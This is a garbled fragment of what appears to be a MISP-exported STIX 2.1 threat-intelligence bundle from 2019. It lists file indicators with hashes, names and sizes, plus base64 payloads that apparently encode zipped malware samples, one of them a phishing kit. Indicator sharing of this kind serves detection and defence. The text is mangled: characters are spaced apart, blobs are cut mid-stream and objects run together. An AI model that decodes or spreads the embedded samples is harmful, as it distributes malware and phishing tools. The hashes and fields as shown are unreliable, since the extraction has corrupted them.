s z p a g S J y Q c U d 4 z 6 u C I q 0 F g r q Z n f j T B S u 7 X + 1 C y G U p n T y D x m E P I T m 8 / K W r 984 C x y K b Y r j 2 z o k r 83e5 q R d R T u 8 G / h c 5 a 6 h P y 4 u q T 0 u 8 P O r h c p l z S B d Q g r x 1 B 2 Q S P f V a r s 6 e j L H J 4 x l a T z k 9 J q T C 32 F w U b Y f E 546 g U 2 Y b d V Q p V D 24 K W v a 3 k B 5 K V B 0 E E b x p l 4 q 8 v K X i r H K j 2 Z W A z 5 C g i I P z q g K 6 N 6 y M w k j W 1 A L a 2 d 0 Q A W q / v 9 f z p Y H q v y A 4 a u + L b z A 2 a f g r l X p / T L w E F q C b O v U J w U n t M 9 F c b N B P j C i g 7 l O I r H / Z q V C l 7 c 1 x x W p 12 W d J 6 N j s o G o G z c + b X 4 J a L E S h c t 0 W N Z p b J 0 M o N E F j C E 7 n 3 V A i N G W v K l O + l L F r 3 a W R d 1 I L R R 0 M D z F J d w m j y S 5 n Y x m 9 i u d P + b k b e S j w J B x 93 Z A q c M G j l E 2 b X Q E h P J X 5 y U R j G Z + R h s D J g h Z E V F n U Y k N t O e Z u M K B N S K z t + l Y a 7 C O S m k a B j e M l Y r y K b f B D A T p 7 x E H T i W x M A r d f Q h A 2 o s r s J p n X e V s Q k i / E C l 7 x i 5 h g 6 V s P T B a u d Y i 7 T H H 60 K Y u g H K T e v 1 t X G O s F Q D P d g 2 q w n 5 B g W c S E L Z R H I 0 2 o K t 4 Z Y F G 8 Y K x a D d 1 w t V k L d x O q z F F Y d Q x V 2 A 5 j 0 m b k 6 S r v T / y H 8 c h R T C l Y W M g 51 W c N O 8 q 5 z A f 8 U N 0 r T s Q M C u C F 5 d C i 3 M L F P x i R 19 X l O l U 5 V K G 2 c e Y P E r y A 6 f y B u A T M U e m b + a X T b C G 4 w M 9 g Y e 6 p 9 B s a Q 7 / q g A + V J k d 2 B h 5 y l r F F s p / A d + O Z E + F M i W h d b 4 J y h F l p I O K g B 7 + r a 0 + H T h C m s Q I f k 96 e e X B m 0 D
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-16T13:45:09Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--06a84b03-0560-46ae-8570-1e7072a0b400" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:46:44.000Z" ,
"modified" : "2019-05-16T13:46:44.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' d a 877 f 4 f 7335264 b 0 3 a c 72 f c a 5 b 305 d c ' A N D f i l e : h a s h e s . S H A 1 = ' 435 a a 871 c d d 772072390 d 9 b a c e a a 8 d 832208 d 710 ' A N D f i l e : h a s h e s . S H A 256 = ' c 0 52025 b 442995 f 0 4 a 68 b 1 b 6 b 2007 c 36 d b f 47448 c 0 8 d c 249219 a 7 f 3 e e b d 369 c 2 ' A N D f i l e : h a s h e s . S H A 512 = ' 6 f f 7 c b 6507259 b c 322 a 8 d 400 c 34060 d 17e33483 d a b 5 b 0 35 d 519447 b 2756 a 49 d a 236 a c c 54 a 413227168 d 7926 c e 758 d f b 169 c 8 d 92 d 58 d 2 c c 9 b 0 c 81 c b 6 d e 383 a 1 f d ' A N D f i l e : h a s h e s . S S D E E P = ' 3072 : z r 3 i 3 A r G d q M W / 5 D s v v q T f A L 3 L K h M b g f G S L 2 Y x P f m X f j : H 3 i 3 A S X Q g v S A / K 7 X i Y x G 7 ' A N D f i l e : n a m e = ' c 0 52025 b 442995 f 0 4 a 68 b 1 b 6 b 2007 c 36 d b f 47448 c 0 8 d c 249219 a 7 f 3 e e b d 369 c 2 ' A N D f i l e : s i z e = ' 156088 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A J l i s E 6 w q w o + z T E C A L h h A g A g A B w A Z G E 4 N z d m N G Y 3 M z M 1 M j Y 0 Y j A z Y W M 3 M m Z j Y T V i M z A 1 Z G N V V A k A A 4 I 53 V y C O d 1 c d X g L A A E E I Q A A A A Q h A A A A K r d C + 5 F I S 7 u u 58 m N v f p + S F O b t t G C k G 2 O S o t d G e Z y P K A e I M N K C 7 f S K 3 / o h J v 9 s a m 0 0 q f M F k Y v U f 6 A u K g F G b j / r d 69 C A e X U F N T 9 S l q 1 K o 3 Z Z o i X f 7 S Y G Y 5 e / r y z 1 M o 0 n u 4 R S H h E I I D X w p n W u L I r i 1 d u m + N Z v F u V 0 Y 0 + + W w y g C J 5 W u 4 F G D Y 0 u R F g y g s y u q n 9 o Z k I m k e Z Y K u E i N P z i d 95 A k G 0 7 A 6 z 0 S V W o Z k O + m f 3 s o f x p / 9 u M z C F s a x T k z h I w W 7 e C T 2 t 1 r 6 t f l F o 0 n m Y c p c c j + + / Y V y r d a n m o / 9 a d s 5 y 8 U x m a Y k l v K 1 p Y I k + D P a b O L y V h i e 8 P 2 B B f L N g u Z t H N S Y o W l D T f x h O 4 x X s 0 21 p k h M e N s x e 7 B k C w s v l x P X m Y 0 I 9 s j 3 b b I D 4 u F u z 3 E R b d U u D R q c x l J R 4 q O 2 r i S k K G 4 + C + b O A m z u 8 N I 6 r + X Q 4 a j C Y H V j 6 w D b D 8 Q r g m T / H l v h h V K z p r i 1 a B V x A g I k j + h Q m g 5 m C E 29 l Q K G k r 1 d G 4 m 9 L 4 G P y + J q Z i P 0 U C r j m 8 n 0 v P D H p t d 4 + G w W r B z P D h 4 m / F d I s S h + E v B 99 n P D h x S j 21 + J f B d v R C 5 l P V 4 M V 7 A N 318 B g w x S t W + 9 i V y v Y v D M h k s G g u / 0 L E R Q F A 2 c 5 O j W I b w K z 6 J R j x D 0 o 0 o L f b f t F a a 4 S z g 64 d T a 1 W O q r R E d v C g t 80 x U j X J K M K O + p 1 + H 2 S 4 C Q h Q l P a r r O s A i f 9 T 8 o X Z L O L q z X 1 F A 71 O X b 9 o O H 2 y L O q Z / x 5 d 5 U S G P 0 k s q e / 8 K 7 / 8 O 4 L U M 3 M l t F D u 93 c x F t R X b S i n B v z z F J 6 L a p o s R M b 94 J Z H Q u B + Y 69 D C W X V z m v U 9 Z u 5 U i I k E b U W N Y H N o p R K V p E Z S A F N 9 m b Y X T 0 o 9 Y K W 6 G 48 e R k r x W b I 9 x K N F 8 z c D X 5 P T m H E l u N h A x x 3 T T X 2 M N r t Y w w 2 t I q p B i u 7 D M v H d J s S 4 x F t M M Z H h K K 7 Q 0 x u y W e h B f y n q C J A K R 0 n 0 u p + v A C y 6 S 45 L u p v 2 l e u E S G J A g W q s I H P n I 5 L / I L N i h u G M C p r h 79 z s u A 7 g a W p + A 41 h I C 2 C R H k e T x + b p w X p B u r S h C K 4 K r o P l U C r Y g q d Q j b q U a d H G K U u e b d A e P V 7 J 8 l G 1 y v X h 0 d 6 T b T T / M z U h V L m 5 w f 4 q g E 7 q 7 q W W M M 60 G w R H F O 2 N n X / v 3 U L B 3 a z 1 S s f N h 6 C X 6 w n u n p i W O 7 r O o f 2 z 3 z v 6 V E R n N k 52E52 p F Y v X y Z p R Z 8 C e L g M a d k C q g l d t v 72 t + z z A o F + s 2 K Z C B d 9 Q r J G c H 7 j 1 J C h 6 D 6 c F I d a U A 0 c C L X N h x U A K 1 x z K b Q 6 U 7 L w p I o S E J 91 U P C j 9 d 6 k R w Q E 5 H 9 I e c 68 + c 8 l w R W F T f P x C n d O L b o Y Y L f 8 L + y i I b / E B u s 7 f 55 / j l 7 r W + Q V + M l W t L A f w C m f i r s a 8 q y I 2 m V S 9 E V P q 5 + n O q f o q H 4 X m o l 8 l e A Y W B s 9 g i c d / 0 8 d 1 M b U o 0 K Z D 1 o 1 X 9 M c U 95 k l + g O M G 8 F j M 7 E j y P X Z N D a y k w q t + j N j R R 6 k o 7 O / j 7 F 4 v 0 y T U D I B k O 8 q x h v 97 j E y k / C D M v F 8 s L 6 m X b a 6 X d / B O D g 5 + Z n C + O d k A o e t L m P y v 0 q O C t s t K 1 T U X b A C h G A h F a g b H c k u B j / Y U g o B b w o m a 2 a E m j 0 p L n m y 2 C 0 x q x 0 U 1 z v 5 l / K 0 Q K C W b w F 9 s f w a f N 1 Q J y E 8 J X Q d c e U Q J N b Z p 8 e d C V c Q 39 Q a W q 2 R L N j k 77 S q R t l S I W l P R v Z 5 T b x J 1 m b Y Q h C q T Q X H D Z F b t v m d W q I A O X R K 0 j K b u X Q 4 c + d 9 R t 0 W g 0 y 0 g z z h t P b d P p O 2 F M r o R Y P w R m 5 L Q I I r 74 F u 0 5 H x O J F C d + K f f q F t n + G 75 w F 6 I 2 P Q 2 g a V + v t 4 L G P f h z a r X 4 u y u i T n m 6 P p v G b 7 k k O x F g W i W J 2 R 5 c C a v A h v B i W J R L 2 C u r 5 Q G M A A P 46 R J X o 1 j D D n Y 3 C b 6 C 7 Z t R M G h G t z F H p C u D W e x 2 c 2 l q I L L G Q H I P 0 a q V l b n r 7 y m E 9 q 6 a x M D V U c e N 1 e V x Q / q e I V X Q f l k 3 U v E L 7 V R e b b h 2 K B 83 W x c A 3 E H j v O C 3 T d s 8 f m 0 W 1 h G R l c o S G d Y L B i y i v V 55 F O v O J Y 2 Z V B N Y p J Q o Z U J d v 2 O u A q v / I Q k 4 N Q R p G W u H Z / k m o I j 6 N j s o u U p D V l 35 W q b S K b x i r L s 0 u r w H L 8 t M c h K Z W g 3 R W n P T S n 36 z B U d o + l y n C o z 9 Q i v d D M c s U l U g N W / 0 a / J d A Z 2 + B 5 A I X s 5 c d I G m 5 X J o 2 U f H 3 C n u r P I D t Q 7 X K Q A o 6 z Z C l R h t 3 j N C Y d 3 k M V n R 374 f l U V Y 3 Z A p l 6 I I b H U b i 52 z v n Q t 1 K 3 F r D e 4 e c r T v g F S K E P S g E u y A P t + C m N y S b o T y c K u T a c L 9 D e z O N I 9 K K + 6 s h X 0 K i 1 B z 4 b 7 i 2 O H Z K U k n u D m y k o m 0 L + d f / 1 u w T y W 3382 O C 9 P x 0 8 u 6 z 1 c T P G 4 z h y 1 M r 6 d / o V 728 y q 1 k g g U h g x p p t m b P 6 A x l G B 65 d 4 U k 3 I f F i 8 G 28E5 r j C v 34 b 4 Y v w e 7 v A 6 V 1 V T A F h n b u 1 s y / K D N 9 A x 6 M x 4 + A v / 3 w z 5 M P x 94 T + p P w s N v M D t u c v M 2 z K D m 5 e q I G N 8 X o B s Z C f F H a 1 v t 4 m C 2 H I U S D + 30 P / 4 f M Q Z f D F l A T b p 5 + K r A f C U 0 z 0 s + z Y H A I f Y r 5 / 4 g f d d B E H 8 H 1 Q y t 1 r h 2 J n P b B E M L M a / 9 k Z g l w h F Q k s b t 9 P R E H y L i + w m p + a l e L 33 H M O 1 a Y G O R S T p c j c G o E T B 9 Q j p Q I J 0 M e r D 586 i / s a U J p A O O C G j 3 Z m m F O w Y s U e 8 U a 60 l N a w t C C o m U / Z Q q W I 5 n O 4 j v a X P u V P M 4 b 8 h t j R E J r S F l S N Z H u S i 1 f x T Q y h G / 0 l / e g W N c G F c / 19 D 3 l l j j j u v d 9 / E U e Y 4 S Q v U X V x H l G J I 2 x q 4 m h y 8 + A / g N m / V u Z K h t N k Y l r f r y m X u V W Y R I R Y U o 1 k / x + n S h D 6 s 6 Q 9 d c c J D U D 3 R z 9 F b x l P 6 k X D M E M T Y S e W R i L A r d 0 k x H P t w A h P 5 Q c 8 f d d 2 a F p G P W 1 m n I l N 798 j O O O v 7 E O k v p d D x N f P v a E K H T g E S H I H P L J K K x c a p F O r / U 4 T s U d q y D p u y z Z Z q G t 73 F a n S 1 f I c s U Z u c Z I s z W 0 S D S 5 K B w v o p o G z m R J i X v z Q E u j i + 4 s R d F 8 u E P M i X g z F f t L I w q A N q Q i B Z f 9 i Y H C j V + u z B K g 2 g X c c Y s w W x b + 4 s i b 0 j Z q B 3 e + Y l 7847 t 3 v W G 6 G 1 w a e H l a o x T d 5 U k G w R J D 3 D 3 W 4 e G X Y 21 I G l j E g r G Q m 12 U 9 S 4 i 5 A o H 4 e w c 5 O N G A j 52 s G M x N U d 3 R l b m J m u g w D R c + W f e 8 u E L Q g X B s J k l a J n Z Y P i n P a t A 3 N x w j Z I B 1 g S E h Q w 3 n S 8 M y I r 97 G W z k u O / z 6 Z j h c Z y p P Z e 0 + Q 4 D h p + K 9 s D z U 4 f / 0 Y p / N D h q K A a m v q + J / Q t W 3 N + A f b 9 T a n x i G + C 9 a w H h Z Q O 6 x g u c J 5 l G m 12 s 0 e o Q F g u / j x g 8 / n X c 37 j 1 g K P i I 6 + e k R x W y / a J n n p K U A X a c t + S 3 i z l I g o u 6 w L P Q 3 C N z + f K h E v E i R A X x d u 5 m M
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-16T13:46:44Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--453258ef-0925-4471-9dcc-a06ab8038664" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:48:15.000Z" ,
"modified" : "2019-05-16T13:48:15.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' b 830 f d 2997e1 f 124 f 34 d 77 f f 1 f a 9 b 89 e ' A N D f i l e : h a s h e s . S H A 1 = ' e a 43350 c 37e0 c 266 c 12 d 0 f d 53643 c f 94 d d 58 c 1 f 7 ' A N D f i l e : h a s h e s . S H A 256 = ' f 2676 b 94952018 c 220 e e 352 b 9857 b c 5 a d 62195 b 2 d 15 c d f a f 54 f a 5 c 5985 d 6934 a ' A N D f i l e : h a s h e s . S H A 512 = ' 24 a 7 f 8 c 2e5 d 774554 c 69113 b 4 b 81 a 9755113 d b 1 a c 620e0 d 9 f 0 339919 a 0 982e7 c 169446 c b 0 f e 4 f 3 a 9232 f 757 a 9 c c d 82676 f 55207 c c 0 44033e3485 d 1 f 22 d 965 d e 1 ' A N D f i l e : h a s h e s . S S D E E P = ' 12288 : Y n 4 i j M b 7 m 7 M U e G A p K W x w 1 R F n / 68 R 4 V 6 S p 22 l e U W d 3 F : Y n 4 i Q U w Q D k p 6 h d V ' A N D f i l e : n a m e = ' f 2676 b 94952018 c 220 e e 352 b 9857 b c 5 a d 62195 b 2 d 15 c d f a f 54 f a 5 c 5985 d 6934 a ' A N D f i l e : s i z e = ' 485888 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A J p i s E 7 F V f Z s b s s G A A B q B w A g A B w A Y j g z M G Z k M j k 5 N 2 U x Z j E y N G Y z N G Q 3 N 2 Z m M W Z h O W I 4 O W V V V A k A A 4 M 53 V y D O d 1 c d X g L A A E E I Q A A A A Q h A A A A V a b 4 N t h 0 g 5 t x b k P N E O K 6 Q S m p Z E P H L v C F F 4 v c M M + l n b M V H B c V M I b L a a 5 + 4 i 54 h m Y 9 I v y U I 49 m 98 K r U T 2 A r s B f s X L T S v k a M c f I e M 7 l / c 0 U w + L 7 u W p m K l k M g b L e W U o L n 9 J Z k 2 V V v t / j w c D C D Z g v c Z r C P s T 18 b c 0 P Y U d J Y a N 30 / y w D 6 U 5 h 2 s g o E E O p E S Q y / V c y X x l Y U y A C u e H 3 J i 3 G U n 3 v m K u m p E 1 S z o W q 4 C S J r r w A j C 93 f s B d 1 j L 3 z F T o y a Q T z q q b M + J I 16 t s C O 41 R k h D i Y F 0 P 2 p k m 6 m 48 O t 7 y T k N u E u o s P 85 c k P 9 W w d 2 v r + l 6 N M 4 U z R L s 3 Z Y 3 + 1 B k i d h N Q 1 w / 1 U J E g g 7 y W t i Y U S 2 t r Z L / B W B / Z P N / 0 o L 407 Q m 5 N + C w B R l t 7 s f a D v 5 r 9 o Q W x O c u E a B t v Y M j 3 y W 9 g S h Z M e 4 R u g V K t z 0 Z C n F y R K 5 H x G o 3 t u z O a + 9 Q h L W Q G U v B W + n v o Q A Y B / M 5 i u Y O X v N / j 94 h 0 u 6 T X C q f s O 2 D C a i G 94 m 0 t L q L 1 a Q C T 2 I P + b G F J g p G X u 0 7 x + 4 o U 0 q g z K k F V y P z X e p H A / H d t W O E u z 5 V h R h E K c Z m b B H 62 b g 0 j e l I 8 M F o W I + 4 w s P 8 p S Y 1 + g 3 P a H 9 Q m S 2 c g I 6 u 3 q O W P 4 H 7 l y U / N T b b N U X W / c B b h P B 8 r M r r G U m u s L E x c N 0 q W L Z X q 6 F x j X E 4 J Z 0 S J A m o 82 y H M c T S m E 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
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-16T13:48:15Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cdd5ff1-ed58-46d3-bed7-4bae950d210f" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:52:15.000Z" ,
"modified" : "2019-05-16T13:52:15.000Z" ,
"description" : "Phishkit" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' b 7245 b f 657e792328 a a a c b c 6 f 75 d 1555 ' A N D f i l e : h a s h e s . S H A 1 = ' b c 32 f f 3213011 d b 8278 b f c d 21 b 1 d c 432 d e d 499 d 3 ' A N D f i l e : h a s h e s . S H A 256 = ' 9 c 4 f 9755 f c 183 f 6 a d 4 a d 4 d 600 a 0 a 3 e d 9230900152245 f 924 b 9106202 c e 543 c 58 ' A N D f i l e : n a m e = ' N e w - U p d a t e d - d o c s . z i p ' A N D f i l e : n a m e _ e n c = ' A d o b e - S t a n d a r d - E n c o d i n g ' A N D f i l e : s i z e = ' 3525231 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A J l o s E 5 o 9 A i Z Q O g 0 A G / K N Q A g A B w A Y j c y N D V i Z j Y 1 N 2 U 3 O T I z M j h h Y W F j Y m M 2 Z j c 1 Z D E 1 N T V V V A k A A / F f 3 V z x X 91 c d X g L A A E E I Q A A A A Q h A A A A U S G k G H x c 7 D i c f J L i M Q w A M n z w R e K 5 v + u c X 5 R / R i S L 4 x N Z M W R 5 s K K j m F w E Y c V 2 C X w W 7 O S q x d f x w p p b 7 i J L g b H F l K d m f N W L M z p h 9 C + K z X 2 Q o 5 J c H n q t t Z b 5 Y D f k / w z M K i c u K S S D Y 3 A M S 8 x j Q o V i R Y R w S K j w x g 7 + u S u + T b r Z + e e x 33 l 6 + 16 n A r f F l c 48 T M s K b U Z q y T V 7 t k / g p U R I H o o + N 8 U B d r n w U Q M e L B E n X h e 1 P k A a F P A 4 M C o 1 T l k b K B w x m O H K Y u H e a E Y o F k / E 2 / L R o E 3 h K r O V U O 2 n p R 56 f v Y G 5 C W W f C 649 R D h p U 17 U x 9 k e K p 83 J B I 0 F b 9 W Z x p + y t e k n A G Q 9 f c j Q t p f m t m F 0 W l y 4 y r o C I 8 z j 4 L 0 i K U 86 d s V t v 598 k v / q S Y 4 a w i F / F f 5 j S B i W 9 G i w B L Y 7 t V V 0 1 q Z a w m A L + u T 8 L c b u h 4 + R V 3 V 0 E v e X j z J F B n F 7 o r h A I 2 a G 41 D y U R Y / 756 k 4 J Z K 8 a i c F c d + T T X m C t E H v x J H S f j C E K n x B b 3 a v h 4 V p Z u Q 5 / H f E M P A a n N 0 9 W X H A G 2 o F M B R K J H O A E 7 h 7 l 35 A F U G 885 t E s e l 5 O 9 B j F s D y i a A y o q X V T Y O U C 7 x u O W v Y 1 B m f n O p / U Q R n N e V 6 u i D m D h p S o 6 L S + 3 o V S P 523 m e F Q b j h A e 4 n N f M X z k 4 G + f O F Q n Q 72 j F 8 W i T w Q k + r U R J z m N 0 T j A P A R w u z s Q a Q b D f W g d P b U K 95 j K n V I 5 P n j + 7 B 1 s a 7 L m + U J 6 S w q 9 b S x J 6 g x N 8 F g 3 Z L M h H B n D g D p v z a 3 a T 3 Y l W y 2 M 4 H a 5 w 9 O + 8 Z M B S f y E d A d L c v B z 0 n M x X k q 5 x W + R R f w z B X g 0 b / 0 h B l 1 b P 2 o w e O E L V V c v K v p T y A f U y d a K s G 42 L 4 y a S S T c o 55 r i v I Q B M S E h V J u x G 7 T 9 r M f g S W n G Z Z F j t G W R p R n 1 b / C 3 u 9 T o 5 M 0 L P L e j T R r d L G 2 J 4 + 7 U B s C Q e N l 1 / t E T C w x h b Q 0 R j h Z I f I 55 n N M u i 5 E m h 5 P J / F h O V o G A D P 2 i H j O Y h 6 K 8 / K 0 1 f Q 4 p 2 n / N 4 L D + C z f S o N h R t C + y V M m A T H f 3 t q h F 3 J a A a n b J 8 k s N d J L g Y u X M t p l a B 4 a a Z P U l Q V K I 1 s 6 + d Q k q 1 u P T m V D s S R O j z 7 H C H B t v m K z B X g Z I 5 + R A Q a o U u h y v C 3 S Q J J K 1 w 0 f 32 s v K 7 R z H K X 791 g T b H y B M 0 J E f o s X y c k Q T w 9 g L h W c j u I d e X 36 f i M B Y 0 H e Q i L F a n I y a 3 N e 2 J q l i 5 z M 4 I m V 5 u V m f k f 1 f 8 / W B y b X p 5 S S s 39 j Y S Q J I Q e I Z o l i F O X d C x y t z / j d o 4 A H m q g X 5 h c j Z H 1 s h 7 E y d o 10 w 4 / 3 m 3 l O v Y Z T H 5E2 D M h Q F 5 q f k U y a c o O X Q C M J i Z 1 C O I q E Q b z r g h P e J U P P 7 / A w C n f q P o W C 1 k l 6 Z b 8876 q 1 h n o i J K D D 476 + r 3 q z f j G y s G I p h c 5 z o n H M l Q Z R z o T U 41 s u 6 + / W d u W a l 76 v m S X z 8 Q a N q 2 Z 9 y j 6 k n T s s F h w a Q U T S p m D A y 3 e c E + F k 6 n h c R j v a V F M J f o g 5 S Y R y d N V 9 U n t K 2 C j G 2 n b C L 1 q 7 v C 4 M L + F b T x X G j H P Y R 3 d 6 d 8 X W k S w u 5 W I f Y 7 h g 1 r T + z T S N 1 u A l 3 z 1 q + s u f e j H k / m W p 2 q x J v m f d o A x q z V D B 9 K u O d c g p L N c r c U + t x P V u 6 I U u / L A J B o Y F P X N F w d f J x F x v U R T Z 8 G u y R D 7 r j E X j k a 8 O / f E l 5 / S 1 u B 1 O s M P a v m Y I + X t Z 3 Y O Y c l u N x V y x 9 D a Y B i H B b 8 / d 7 S I Y s g W r Q 2 u B a a a / m 4 j p h y 23 u X 3 S V A X b y z 0 7 Y B j i e z D Y Y x L 7 B l l E W i g / j r z 73 E U T m 2 b q U 7 A q T H E + u K P Y d N h 6 / Q V W l R 52 g m h e c 1 K o p K h w N k l h O + X o I K p O K 77 Z a 9 I 32 W T P a 8 K A D Y I 6 O 7 o T 9 e z 0 b V Z i O O E N D a q G y 8 B b j H u u 481 y q k l 6 a 8 m F t w w U h h 3 X B L 33 G T 5 S 5 n 5 r N B n 8 g N W r 0 G W L 0 B K 8 W I t d W M i y Y i F t 7 F O H I T c 9 J N h d k 8 i E L J z x B f M T 8 V m B B q k z I q r T o W T Y a B 3 j 2 P 7 x t 9 s o s 8 R m H R m 2 D 60 B Q t j W D k l J Z O f 5 U A Y d y x 9 S d A z B o O I U 6 j O i m K H J d Z o j d 1 O 0 Q V e 25 x 1 X D / d h p L I 3 P 1 c 4 Q C f n 1 M 8 s 9 q f 31 c t p 8 I / 3 O R B q q c E m 66 c C i V G J Y 7 H P M i H O + Y S f R u F 0 / k c q l L K a + Y f Y p u u N x V 8 c 4 k q E s X X 7 r C 6 k b K j 6 c M 64 F / l Q k c Q 2 / o u k f o q s i 5 y r S 9 U E O a M R / 9 d M x q c L D f E A i x L T g C e i 1 j Z H T u m J q E l a Y c 0 v j 76 E a b H V B o D j + c l K P G V + S 6 d G F J 4 s G 6 S P 46 j A l d 1 d 2 c x h I E j 32 X v 0 U 4 T 7 Z y L 61 s / e G R 5 P 76 F U T Q I 1 K i + 1 S 1 H W n r S 7 x w P W / C y Y 8 d 99 c x Y X N V T b M + I R f u Q E A U X P F P l 473 g N J + h r / m N u d W A A 27 I 0 p 1 K k m K Q g X j X j O 5 u W A H A M m K l p F o k 